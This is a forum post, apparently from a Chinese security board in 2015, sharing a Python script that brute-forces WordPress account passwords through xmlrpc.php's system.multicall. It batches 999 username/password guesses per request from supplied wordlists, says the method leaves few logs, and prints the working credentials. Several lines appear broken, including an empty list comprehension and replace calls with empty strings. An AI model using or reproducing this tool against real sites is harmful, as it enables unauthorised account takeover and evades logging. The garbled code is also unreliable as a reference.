90_ 发表于 2015-10-11 22:29:02

xmlrpc暴力破解脚本

90sec@C4

# coding=utf-8
# author:c4bbage@qq.com
# weibo:http://weibo.com/s4turnus
 
import requests
import httplib
import urlparse
import io
import argparse
 
 
def post(host, pl, port=80,  path='/xmlrpc.php'):
    postHead = {"Host": host, "User-Agent": "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0、c4bbage@weisuo", "X-Forwarded-For": host, 'Content-Type':
                'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Connection': 'keep-alive'}
    postcontent = '''<?xml version="1.0"?>
        <methodCall><methodName>system.multicall</methodName> <params><param><value><array><data>     </data>
        </array>   </value>    </param>    </params>    </methodCall>
        '''
    resultHtml = httplib.HTTPConnection(host.split(":"), port, False)
    resultHtml.request(
        'POST', path, body=postcontent.replace('', pl), headers=postHead)
    page = resultHtml.getresponse()
    pageConect = page.read()
    return pageConect
 
 
def main():
    parser = argparse.ArgumentParser(
        description='wordpress brute force tool. This is a multi-group account password request. A request Riga one thousand group account password no problem. Xmlrpc will log a few logs.. \nby c4bbage http://weibo.com/s4turnus')
 
    parser.add_argument('-t',
                        action="store",
                        dest="url",
                        required=True,
                        help='exp: -t http://weisuo.org/xmlrpc.php'
                        )
    parser.add_argument('-u',
                        action="store",
                        dest="userfile",
                        required=True,
                        help='exp: -u username.txt',
                        type=argparse.FileType('r')
                        )
    parser.add_argument('-p',
                        action="store",
                        dest="pwdfile",
                        required=True,
                        help='exp: -p password.txt',
                        type=argparse.FileType('r')
                        )
 
    args = parser.parse_args()
    url = urlparse.urlparse(args.url)
    userfile = args.userfile
    pwdfile = args.pwdfile
    if(url.netloc.index(':') > 0):
        urlport = url.netloc.split(":")
    else:
        urlport = 80
    # 每个请求999组账号密码
    t = 999
    users = userfile.readlines()
    pwds = pwdfile.readlines()
    pl = '''
    <value><struct><member>
        <name>methodName</name>
            <value><string>wp.getCategories</string></value>
            </member>
        <member>
        <name>params</name>
        <value><array><data>
            <value><string>1</string></value>
            <value><string></string></value>
            <value><string></string></value>
        </data></array></value>
    </member></struct></value>'''
 
    up = [ for u in users for p in pwds]
    i = 0
    apl = ''
    while i <= len(up) / t:
        apl = ''
        s = i * t
        for a in up:
            apl += pl.replace('', a).replace('', a)
            pass
        res = post(host=url.netloc, port=urlport, pl=apl, path=url.path)
        #   提取结果
        if(res.find("categoryDescription") > 0):
            rr = 0
            for r in res.split("</struct></value>"):
                if(r.find("categoryDescription") > 0):
                    print up
                    # 成功后退出
                    exit()
                    pass
                rr += 1
        i += 1
        pass
 
if __name__ == '__main__':
    main()

页: [1]
查看完整版本: xmlrpc暴力破解脚本